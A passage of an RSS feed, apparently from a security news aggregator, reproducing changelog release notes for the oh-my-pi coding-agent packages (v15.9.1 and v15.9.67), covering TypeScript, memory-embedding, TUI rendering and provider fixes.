<p>Fixed <code>tsc --noEmit</code> against <code>packages/coding-agent/tsconfig.json</code> reporting 56 errors under TypeScript 5.x (<code>builtin-registry.ts</code> × 46, <code>agent-session-openai-responses-replay.test.ts</code> × 10). The repo's own gate (<code>tsgo</code> / TypeScript 6.x) already accepted the <code>() =&gt; void</code> slash-command handlers, but 5.x rejects them because it does not coerce a <code>void</code>-returning function value into a <code>() =&gt; T | undefined</code> slot. The <code>SlashCommandSpec.handle</code> / <code>handleTui</code> signatures and the test's <code>createPersistedSession</code> <code>populate</code> callback are now expressed as a union of two function types (one returning a <code>SlashCommandResult</code> / target, one returning <code>void</code>), so the existing handler bodies typecheck on both compilers (<a href="https://github.com/can1357/oh-my-pi/issues/1821" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1821/hovercard">#1821</a>).</p>
</li>
<li>
<p>Fixed <code>omp update</code> leaving <code>@oh-my-pi/pi-natives</code> and the platform-specific <code>@oh-my-pi/pi-natives-&lt;tag&gt;</code> leaf at the previous version on <code>bun install -g</code> updates, so the next launch loaded a stale <code>.node</code> file and aborted at <code>validateLoadedBindings</code> with <code>The .node file on disk is from a different release than this loader</code>. <code>omp update</code> now pins the native addon core and the platform leaf to the same version it installs for <code>@oh-my-pi/pi-coding-agent</code> (<a href="https://github.com/can1357/oh-my-pi/issues/1824" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1824/hovercard">#1824</a>).</p>
</li>
</ul>
<h2>@oh-my-pi/pi-mnemopi</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Changed <code>Mnemopi.recall()</code>, <code>Mnemopi.recallEnhanced()</code>, <code>Mnemopi.search()</code>, <code>Mnemopi.query()</code>, the module-level <code>recall</code>/<code>recallEnhanced</code>/<code>search</code>/<code>query</code> exports, the <code>BeamMemory.recall</code>/<code>recallEnhanced</code> methods, the free <code>recall</code>/<code>recallEnhanced</code> functions in <code>core/beam/recall</code>, and <code>orchestrateRecall</code> to return <code>Promise&lt;RecallResult[]&gt;</code> so the recall pipeline can auto-derive <code>queryEmbedding</code> from the query text via <code>embedQuery</code>. Callers must <code>await</code> recall calls; pass <code>queryEmbedding: null</code> to opt out of auto-embedding and stay on FTS-only.</li>
<li>Changed the MCP entrypoints <code>handleToolCall</code>, <code>callToolJson</code>, and <code>handleJsonRpc</code> in <code>mcp-server</code>/<code>mcp-tools</code> to async so the recall/shared-recall handlers can await the new <code>Promise&lt;ToolResult[]&gt;</code> shape; external MCP transports must <code>await</code> these.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>memory_embeddings</code> never being populated by the production <code>remember</code>/<code>rememberBatch</code>/<code>updateWorking</code>/<code>consolidateToEpisodic</code> paths; embedding generation is now scheduled as a background task on <code>beam.pendingExtractions</code> (mirroring <code>scheduleFactExtraction</code>), so configured providers (fastembed, OpenAI-compatible API, custom) actually run and rows land in <code>memory_embeddings(memory_id, embedding_json, model)</code>. (<a href="https://github.com/can1357/oh-my-pi/issues/1832" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1832/hovercard">#1832</a>)</li>
<li>Fixed <code>recall()</code>/<code>recallEnhanced()</code> never deriving a query embedding from the query text, which silently degraded every deployment to FTS-only regardless of provider configuration. The recall pipeline now auto-calls <code>embedQuery(query)</code> when <code>options.queryEmbedding</code> is undefined; pass <code>null</code> to keep the old FTS-only behaviour. (<a href="https://github.com/can1357/oh-my-pi/issues/1832" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1832/hovercard">#1832</a>)</li>
<li>Fixed <code>toRecallOptions</code> dropping <code>queryEmbedding</code> between the <code>Mnemopi</code> facade and the beam layer, so callers can now explicitly pin or disable the query vector through the public API.</li>
<li>Fixed <code>withMemory</code> (CLI) and <code>withBeam</code>/<code>withSharedBeam</code> (MCP) closing the SQLite handle before background fact-extraction and embedding tasks finished, so short-lived <code>mnemopi store</code>/<code>mnemopi sleep</code> and MCP <code>remember</code>/<code>update</code> paths now drain <code>flushExtractions</code> before close instead of silently dropping <code>memory_embeddings</code> rows. CLI handlers and MCP <code>handleRemember</code>/<code>handleUpdate</code>/<code>handleSleep</code>/etc. are async as a result. (<a href="https://github.com/can1357/oh-my-pi/issues/1832" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1832/hovercard">#1832</a>, follow-up to <a href="https://github.com/can1357/oh-my-pi/pull/1833" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1833/hovercard">#1833</a> review)</li>
<li>Fixed the process-wide <code>embedQuery()</code> cache in <code>core/embeddings.ts</code> keying by query text alone, which let two <code>Mnemopi</code> instances in the same process with different providers/models cross-contaminate their <code>dense_score</code> rankings. The cache key now includes a WeakMap-assigned provider identity, the resolved model name, and the configured <code>apiUrl</code>, so disjoint runtimes never read each other's cached vectors. (<a href="https://github.com/can1357/oh-my-pi/issues/1832" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1832/hovercard">#1832</a>, follow-up to <a href="https://github.com/can1357/oh-my-pi/pull/1833" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1833/hovercard">#1833</a> review)</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed the OSC 11 appearance poll re-querying every 2s forever on terminals that support Mode 2031 but never change theme, whose repeated OSC 11/DA1 writes cleared the user's active text selection (breaking copy every 2 seconds). The poll now stops as soon as DECRQM confirms Mode 2031 support, since push notifications make polling redundant.</li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Fixed</h3>
<ul>
<li>Hardened <code>getIndentation</code> against malformed paths: any filesystem error from the <code>.editorconfig</code> probe (e.g. <code>ENAMETOOLONG</code> on oversized garbage path segments) is now swallowed and cached as a miss instead of escaping and crashing the TUI mid-render (<a href="https://github.com/can1357/oh-my-pi/issues/1871" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1871/hovercard">#1871</a>).</li>
<li>Fixed <code>getIndentation</code> (and the edit renderer's <code>replaceTabs</code> callers) crashing with <code>ENAMETOOLONG</code>/<code>ENOTDIR</code>/etc. when handed a path with an overlong component or a non-directory in its parent chain. Editorconfig discovery now short-circuits to the default tab width on any path component above <code>NAME_MAX</code> (255 bytes) and absorbs any <code>FsError</code> while walking the editorconfig chain — best-effort discovery must never escape as an uncaught exception (<a href="https://github.com/can1357/oh-my-pi/issues/1872" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1872/hovercard">#1872</a>).</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(robomp): backfill partial-clone blobs before worktree add by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4586156887" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1820" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1820/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1820">#1820</a></li>
<li>fix(coding-agent): made slash-command handlers compatible with TypeScript 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4586302922" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1822" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1822/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1822">#1822</a></li>
<li>fix(coding-agent): sync pi-natives on omp update by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4586537250" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1825" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1825/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1825">#1825</a></li>
<li>fix(tools/ssh): render multiline remote commands in a framed body block by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4586853964" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1830" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1830/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1830">#1830</a></li>
<li>fix(mnemopi): populated memory_embeddings on remember and auto-derived queryEmbedding on recall by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4587474942" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1833" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1833/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1833">#1833</a></li>
<li>fix(ai): preserve kimi-k2.6 reasoning across tool calls by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4587940457" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1839" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1839/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1839">#1839</a></li>
<li>fix(robomp): serialize same-issue event claims by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588054083" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1841" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1841/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1841">#1841</a></li>
<li>fix(tui): list marketplace plugins in settings panel by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588163194" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1844" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1844/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1844">#1844</a></li>
<li>fix(ai): honor Anthropic cache-control compat for OpenAI-compatible providers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588252625" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1847" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1847/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1847">#1847</a></li>
<li>fix(providers): add Xiaomi Token Plan support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588308887" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1848" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1848/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1848">#1848</a></li>
<li>fix(providers): cap Kimi K2.x maxTokens on Fireworks/Fire Pass at 32,768 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588442297" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1852" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1852/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1852">#1852</a></li>
<li>fix(providers): enable append-only auto for xiaomi sgLang endpoints by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588495346" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1854" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1854/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1854">#1854</a></li>
<li>fix(mcp): update completed tool status icons by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588591896" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1856" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1856/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1856">#1856</a></li>
<li>fix(ai): drop image content for DashScope compatible-mode text-only Qwen by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588990930" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1861" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1861/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1861">#1861</a></li>
<li>fix(coding-agent): restore Exa MCP fallback by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4589028789" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1862" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1862/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1862">#1862</a></li>
<li>fix(coding-agent): keep local plan writes off ACP bridge by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4589204923" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1864" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1864/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1864">#1864</a></li>
<li>fix(utils): swallow editorconfig probe errors to keep TUI rendering safe by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4590382708" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1873" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1873/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1873">#1873</a></li>
<li>fix(utils): tolerate malformed paths in editorconfig indentation lookup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4590394502" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1874" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1874/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1874">#1874</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v15.9.0...v15.9.1"><tt>v15.9.0...v15.9.1</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v15.9.67]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Fixed

Fixed llama.cpp/OpenAI Responses parallel tool calls losing arguments when function_call_arguments.done events omit output_index and item_id, by routing those identifierless final-argument events through the open function calls in item order. (#1970)
Fixed local Ollama (ope...]]></description>
<link>https://tsecurity.de/de/3580233/tools/v15967/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580233/tools/v15967/</guid>
<pubDate>Mon, 08 Jun 2026 02:50:55 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-ai</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed llama.cpp/OpenAI Responses parallel tool calls losing arguments when <code>function_call_arguments.done</code> events omit <code>output_index</code> and <code>item_id</code>, by routing those identifierless final-argument events through the open function calls in item order. (<a href="https://github.com/can1357/oh-my-pi/issues/1970" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1970/hovercard">#1970</a>)</li>
<li>Fixed local Ollama (<code>openai-responses</code>) turns failing with HTTP 400 <code>invalid reasoning value: "minimal"</code> when a discovered model ran with <code>minimal</code> (or <code>xhigh</code>) thinking. Ollama's OpenAI-compatible <code>reasoning.effort</code> only accepts <code>high|medium|low|max|none</code>, so discovered reasoning-capable Ollama models now carry a <code>compat.reasoningEffortMap</code> remapping <code>minimal → low</code> and <code>xhigh → max</code>; non-reasoning models are left untouched.</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Added</h3>
<ul>
<li>Added <code>timeout-pause</code> and <code>timeout-resume</code> eval bridge status events emitted around <code>agent()</code>/<code>llm()</code> operations</li>
<li>Added a <code>/copy</code> picker: <code>/copy</code> now opens a fullscreen, outlined tree of recent assistant messages with their code blocks nested beneath (like <code>/tree</code>). Navigate with ↑↓, and Enter copies the highlighted node — a whole message, an individual code block, "All N blocks", or a bash/eval command interleaved with the assistant turn that issued it. A live preview pane shows the selected target, wrapping prose and syntax-highlighting code/commands.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed eval timeout accounting so delegated bridge calls now suspend the cell watchdog and start a fresh timeout window when runtime control returns</li>
<li>Changed <code>IdleTimeout</code> to support reference-counted pauses so overlapping delegated bridge calls keep timeout paused until all calls complete</li>
<li>Changed the default <code>app.message.followUp</code> binding from <code>Ctrl+Enter</code> alone to <code>[Ctrl+Q, Ctrl+Enter]</code> so the follow-up shortcut works in Windows Terminal, which does not deliver a distinct <code>Ctrl+Enter</code> event to console apps. <code>Ctrl+Q</code> mirrors the GitHub Copilot CLI default for the same action; existing remaps in <code>~/.omp/agent/keybindings.yml</code> are untouched, and if another user-remapped action already claims <code>Ctrl+Q</code>, that user binding wins while follow-up keeps <code>Ctrl+Enter</code>. <code>Ctrl+Q</code> is also reserved by <code>ExtensionRunner</code> so an extension cannot register that chord and be silently overwritten by the built-in follow-up handler (<a href="https://github.com/can1357/oh-my-pi/issues/1903" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1903/hovercard">#1903</a>).</li>
<li>Changed all scrollable TUI pickers and viewports to render through the shared <code>ScrollView</code> right-edge scrollbar for a uniform look, replacing their ad-hoc <code>(N/M)</code> / <code>[a-b/total]</code> text indicators (search hints and the tree filter-mode label are preserved). Covers the session/resume picker, model selector, OAuth provider selector, history search, session tree selector, agent dashboard list, extension list, user-message selector, the raw SSE debug viewer, the autoresearch dashboard overlay, and the session observer overlay.</li>
<li>Changed the <code>/model</code> and <code>/switch</code> selectors to dim and skip models whose context windows are smaller than the current chat context.</li>
<li>Changed <code>/copy</code> command targets to appear inline with recent assistant messages instead of as a separate "Last bash command" row at the end of the picker.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed the idle <code>Working...</code> loader freezing on ED3-risk terminals with unobservable native scrollback by keeping foreground live-region rendering enabled from <code>agent_start</code> until <code>agent_end</code>, before the first assistant or tool event arrives.</li>
<li>Fixed framed tool output blocks rendering one column inset inside tool boxes; modern bordered blocks now span the same width as legacy background-filled tool boxes.</li>
<li>Fixed potential <code>TimeoutError</code> aborts for short <code>timeout</code> eval cells during long bridged <code>agent()</code>/<code>llm()</code> work where no progress events are emitted until completion</li>
<li>Fixed retry recovery to allow automatic retries without switching models when <code>retry.modelFallback</code> is disabled.</li>
<li>Fixed <code>ttsr.enabled: false</code> being ignored at runtime. TTSR rules were still being registered with <code>TtsrManager.addRule</code> and matched against stream deltas even when the global toggle was off, so disabling TTSR did not suppress rule injection or stream abort. The manager now gates <code>addRule</code>, <code>hasRules</code>, and <code>#matchBuffer</code> on the enabled flag, so disabling fully short-circuits the TTSR path. Condition rules fall through to the rulebook bucket instead of being silently swallowed. (<a href="https://github.com/can1357/oh-my-pi/issues/1767" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1767/hovercard">#1767</a>)</li>
<li>Fixed the Python eval kernel hanging on Windows during <code>import pandas</code> / <code>import numpy</code>, with SIGINT unable to recover the cell. <code>PythonKernel.start()</code> spawned the runner with <code>windowsHide: true</code>, which in Bun maps to the Win32 <code>CREATE_NO_WINDOW</code> flag and detaches the long-lived child from any inherited console — so native extensions like <code>numpy/_core/_multiarray_umath.pyd</code> (and its bundled OpenBLAS/SLEEF thread-pool init) could deadlock inside <code>LoadLibraryExW</code>, and <code>GenerateConsoleCtrlEvent</code>-based SIGINT delivery silently became a no-op. The kernel now hides its window only when the host itself has no console to share (service / piped launch); an interactive TUI launch lets the kernel inherit the parent's console, matching the behavior of <code>python.exe</code> invoked from <code>cmd.exe</code> (<a href="https://github.com/can1357/oh-my-pi/issues/1960" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1960/hovercard">#1960</a>).</li>
<li>Fixed <code>task</code> renderer crashing the TUI with <code>TypeError: completeData?.map is not a function</code> when a subagent's <code>extractedToolData.yield</code> slot held a non-array value. <code>renderAgentResult</code> (and the live-progress sibling) cast the slot to <code>Array&lt;{ data }&gt;</code> and called <code>?.map</code>, but optional chaining short-circuits only on <code>null</code>/<code>undefined</code>, so a plain object made <code>.map</code> <code>undefined</code> and threw — taking down every <code>review</code> task render. Both sites now go through <code>normalizeYieldData</code>, which wraps a single object as a 1-element array and drops primitives (<a href="https://github.com/can1357/oh-my-pi/issues/1987" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1987/hovercard">#1987</a>)</li>
<li>Fixed <code>sdk-async-job-manager-singleton</code> tests flaking under the full parallel suite. The four <code>createAgentSession</code>-based cases ran on the default 5000ms per-test timeout, which two real session startups can exceed when <code>test:ts</code> saturates the machine across packages; on timeout the still-running test body and <code>afterEach</code> reset raced, surfacing a spurious "Unhandled error between tests" on the <code>AsyncJobManager.instance()</code> assertion. They now carry an explicit 60000ms timeout, matching the convention used by the other session-creating tests in this suite.</li>
<li>Fixed streaming <code>eval</code>, <code>bash</code>, <code>ssh</code>, and <code>task</code> call previews overflowing the live transcript viewport and cutting off their top while pending. A volatile tool block taller than the viewport could strand its scrolled-off head out of native scrollback on ED3-risk terminals (committed nowhere, repainted nowhere) until the result landed. The pending <code>eval</code> source preview now follows the streaming edge in a bounded 12-line tail window (newest lines pinned to the bottom, "… N earlier lines" on top) so you can watch the code being written without the box overflowing; <code>bash</code>/<code>ssh</code> commands and <code>task</code> context use a bounded head+tail window. <code>Ctrl+O</code> still lifts the cap for a full view.</li>
<li>Fixed the streaming <code>write</code> call preview ignoring <code>Ctrl+O</code> so the expand toggle was a no-op while a file was being written. Unlike the <code>eval</code>/<code>bash</code>/<code>ssh</code>/<code>task</code> streaming previews, <code>formatStreamingContent</code> never received the <code>expanded</code> flag, leaving the preview pinned to a bounded 12-line tail window even after pressing <code>Ctrl+O</code> — so on a large write you could not widen past the streaming edge until the tool result landed. The preview now lifts the cap to the full file (head through tail) when expanded, matching the documented streaming-preview behavior of the other tools.</li>
<li>Fixed turn-ending provider errors rendering twice — once as the transcript's inline <code>Error: …</code> line and again in the pinned banner above the editor (added in 15.9.5). The inline line is now suppressed while the same error is mirrored in the banner and restored to the transcript when the banner clears at the next turn, so the error stays in history without the duplicate render at the error moment.</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed the <code>/copy last|code|all|cmd</code> subcommands; every copy target is now reachable by picking it in the <code>/copy</code> tree.</li>
</ul>
<h2>@oh-my-pi/hashline</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Changed hashline file section headers from <code>¶PATH#TAG</code> to <code>[PATH#TAG]</code> so model-authored edits use ASCII delimiters instead of a pilcrow sigil.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed missing-header diagnostics and copied-content prefix stripping to consistently teach and recognize 4-hex snapshot tags.</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Added</h3>
<ul>
<li>Added <code>setPaddingX</code> to <code>Box</code> so horizontal padding can be updated programmatically after creation</li>
<li>Added <code>ScrollView</code>, a fixed-height viewport component for pre-rendered lines with optional right-edge scrollbars and imperative scroll/page controls.</li>
<li>Added optional <code>Terminal.hasEagerEraseScrollbackRisk()</code> so custom/test terminal implementations can override the global ED3-risk profile without mutating the shared <code>TERMINAL</code> object.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed <code>SelectList</code> to render its visible window through <code>ScrollView</code>, replacing the <code>(N/M)</code> text scroll indicator with a uniform right-edge scrollbar (the type-to-search hint line is preserved).</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed unknown-viewport deferred renders freezing bottom-anchored live chrome; deferred history mutations can now repaint only the active-grid bottom row with relative cursor movement, so spinner/status tails keep advancing without rewriting rows a scrolled reader can still see.</li>
<li>Fixed autocomplete popups freezing live repaint on ED3-risk macOS/POSIX terminals with unknown native viewport position; direct autocomplete shrink frames now repaint the live viewport without zero-byte deferral and preserve the old bottom anchor when padding can clear stale popup rows without duplicating committed scrollback.</li>
<li>Fixed focused Up/Down navigation on ED3-risk macOS/POSIX terminals replaying the whole transcript after dirty foreground-stream renders; selector/editor frames now repaint non-destructively instead of emitting <code>CSI 3 J</code> on every arrow-key move (<a href="https://github.com/can1357/oh-my-pi/issues/1962" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1962/hovercard">#1962</a>).</li>
<li>Fixed tmux (and screen/zellij) pane scrollback losing the head of a long streamed assistant reply once it grew past the visible pane, and stranding the chrome/footer in pane history after a later collapse — producing the "repeating chunks and missing sections" reporters saw when scrolling back through tmux pane history (<a href="https://github.com/can1357/oh-my-pi/issues/1974" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1974/hovercard">#1974</a>). The renderer's foreground-streaming cap-to-viewport branch (introduced in 15.9.2 for ED3-risk hosts that can checkpoint-rebuild later) also activated inside multiplexers, where checkpoint reconcile is a no-op (<code>refreshNativeScrollbackIfDirty</code> short-circuits because <code>\x1b[3J</code> cannot erase pane history). Every streaming frame clipped <code>lines</code> to the visible tail and reset <code>#scrollbackHighWater</code> to 0, so any row that scrolled above the viewport top was committed nowhere — pane history stayed empty until streaming ended. Meanwhile <code>#planLiveRegionPinnedRender</code> was explicitly disabled for multiplexers, but its <code>#emitLiveRegionPinnedRepaint</code> is built from the exact primitives tmux accepts (relative cursor moves, per-line <code>\x1b[2K</code>, <code>\r\n</code> to scroll the sealed prefix past the viewport bottom) and never emits <code>\x1b[2J</code>/<code>\x1b[3J</code>. The pinned planner now runs in multiplexers too, the cap branch skips them, and the diff/append path commits incrementally into pane history; the actively-mutating live tail stays in the visible viewport only.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(hashline): accept spaces in edit paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4577887168" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1766" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1766/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1766">#1766</a></li>
